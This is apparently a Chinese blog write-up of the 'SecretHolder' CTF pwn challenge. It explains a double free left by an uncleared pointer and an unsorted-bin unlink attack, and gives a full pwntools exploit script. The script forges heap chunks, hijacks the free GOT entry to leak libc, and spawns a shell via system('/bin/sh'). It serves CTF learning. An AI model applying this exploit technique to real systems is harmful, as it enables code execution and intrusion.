ha1vk's blog
0%

secret_holder

发表于 分类于

本题,附件在https://pwn-1253291247.cos.ap-chengdu.myqcloud.com/SecretHolder,刷题网站上没有提供

拿到附件,我们先检查一下程序的保护机制

然后,我们用IDA分析一下

Free后没有清空指针,可以造成多次重复free

可以多次创建堆,只要我们free后再创建即可

那么,本题,我们可以利用unsorted bin的unlink来攻击

我们先创建一个huge的堆,然后释放huge堆,再创建一个small的堆,再创建一个big堆

1
2
3
4
5
6
7
8
#申请一个大chunk  
new(3,'a'*0x100)  
delete(3)  
  
#申请一个小chunk  
new(1,'b'*0x10)  
#申请一个中等chunk  
new(2,'c'*0x100)

那么,内存中,三个堆的布局是这样的

接下来我们把Small和Big的都free掉,那么在large bin里,有Huge的地址,在fastbin里,有Small的地址,unsorted bin里的big合并到了top块里去了。由于堆指针依然保留着,我们可以double free那个Big块。当我们重新申请Huge的空间回来时,由于**[使用的是calloc,导致Huge内容全部被清空]{.mark},也就是Small、Big的结构体信息也会没有了。[我们要对Big做double free,因此我们既要在Small的位置伪造假chunk,也要重新构造好Big结构体,还有在Big后面再伪造几个假chunk,绕过检查]{.mark}**

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#释放chunk0和chunk1  
delete(1)  
delete(2)  
  
#构造假chunk  
fake_chunk = p64(0) + p64(0x21)  
#fd,bk  
fake_chunk += p64(huge_secret-0x18) + p64(huge_secret-0x10)  
payload = fake_chunk.ljust(0x20,'\x00')  
#prev_size size  
payload += p64(0x20) + p64(0x90) + 'c'*0x80 #chunk2  
#prev_size size  
payload += p64(0x90) + p64(0x81) + 'd'*0x70 #chunk3  
#prev_size size  
payload += p64(0) + p64(0x81) #chunk4  
#重新申请large chunk,使得分配到的位置与chu  
new(3,payload)

现在,堆的布局是这样的

我们再次free那个Big,Big就会与Fake_chunk1发生unlink,而Fake_chunk3、Fake_chunk4是为了绕过边界检查。这样,我们就将large堆的指针指向了堆数组本身,我们就能自由的控制堆指针了。我们先把free的got表修改成puts的plt地址,这样,free时就能泄露出信息。

综上,我们的exp脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#coding:utf8  
from pwn import *  
from LibcSearcher import *  
  
sh = process('./SecretHolder')  
#sh = remote('111.198.29.45',58439)  
elf = ELF('./SecretHolder')  
#huge_secret指针的地址  
huge_secret = 0x6020A8  
bss_addr = 0x602090  
free_got = elf.got['free']  
puts_plt = elf.plt['puts']  
read_got = elf.got['read']  
  
def new(h_type,content):  
   sh.sendlineafter('3. Renew secret','1')  
   sh.sendlineafter('3. Huge secret',str(h_type))  
   sh.sendlineafter('Tell me your secret:',content)  
  
def delete(h_type):  
   sh.sendlineafter('3. Renew secret','2')  
   sh.sendlineafter('3. Huge secret',str(h_type))  
  
def edit(h_type,content):  
   sh.sendlineafter('3. Renew secret','3')  
   sh.sendlineafter('3. Huge secret',str(h_type))  
   sh.sendafter('Tell me your secret:',content)  
  
#申请一个大chunk  
new(3,'a'*0x100)  
delete(3)  
  
#申请一个小chunk  
new(1,'b'*0x10)  
#申请一个中等chunk  
new(2,'c'*0x100)  
  
#释放chunk0和chunk1  
delete(1)  
delete(2)  
  
#构造假chunk  
fake_chunk = p64(0) + p64(0x21)  
#fd,bk  
fake_chunk += p64(huge_secret-0x18) + p64(huge_secret-0x10)  
payload = fake_chunk.ljust(0x20,'\x00')  
#prev_size size  
payload += p64(0x20) + p64(0x90) + 'c'*0x80 #chunk2  
#prev_size size  
payload += p64(0x90) + p64(0x81) + 'd'*0x70 #chunk3  
#prev_size size  
payload += p64(0) + p64(0x81) #chunk4  
#重新申请large chunk,使得分配到的位置与chu  
new(3,payload)  
  
#unlink 3这个large bin  
delete(2)  
#现在,我们可以自由控制三个堆指针了,先修改三个堆指针  
payload = p64(0) * 2 + p64(free_got) + p64(bss_addr) + p64(read_got) + p32(1)*3  
edit(3,payload)  
  
#修改free的got表为puts的plt  
edit(2,p64(puts_plt))  
#泄露read的地址  
delete(1)  
sh.recvuntil('\n')  
read_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))  
libc = LibcSearcher('read',read_addr)  
libc_base = read_addr - libc.dump('read')  
system_addr = libc_base + libc.dump('system')  
binsh_addr = libc_base + libc.dump('str_bin_sh')  
print 'libc_base=',hex(read_addr)  
print 'system_addr=',hex(system_addr)  
#修改free的got表内容,指向system  
edit(2,p64(system_addr))  
#修改堆1指针,指向/bin/sh字符串  
edit(3,p64(0) * 2 + p64(binsh_addr))  
#system("/bin/sh")  
delete(2)  
  
sh.interactive()